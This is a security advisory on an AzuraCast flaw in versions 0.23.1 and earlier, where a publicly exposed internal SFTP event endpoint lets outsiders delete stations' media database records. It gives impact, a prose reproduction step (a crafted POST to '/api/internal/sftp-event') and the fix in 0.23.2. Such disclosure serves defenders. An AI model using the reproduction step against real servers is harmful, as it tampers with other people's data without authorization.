AzuraCast Database Manipulation Vulnerability via Exposed Internal SFTP API Endpoint

A vulnerability in AzuraCast versions 0.23.1 and prior allows for unauthorized database modifications through a publicly exposed API endpoint intended for internal SFTP operations. This issue arises from the incorrect exposure of an endpoint meant for SFTP software 'sftpgo' to AzuraCast's public HTTP API. A user with knowledge of a station's SFTP username and internal filesystem structure can send a crafted HTTP request that alters the station's database without disclosing any internal details. The vulnerability is mitigated in AzuraCast version 0.23.2, which restricts access to the internal API endpoint to the localhost.

Impact

Exploitation of this vulnerability allows for unauthorized deletion of media-related database records for specific stations, disrupting playlist associations and custom metadata, although the media records are eventually recreated.

Reproduction

To reproduce this vulnerability, send a POST request to the '/api/internal/sftp-event' endpoint with a JSON payload indicating a pre-delete action for a file located on the station's internal filesystem. Ensure that the 'Content-Type' header is set to 'application/json'. This request will simulate a file deletion notification from 'sftpgo', prompting AzuraCast to delete the corresponding database record for the specified file.

Remediation

Users can update to AzuraCast version 0.23.2, which addresses this vulnerability by ensuring that the internal API endpoint is only accessible from the localhost.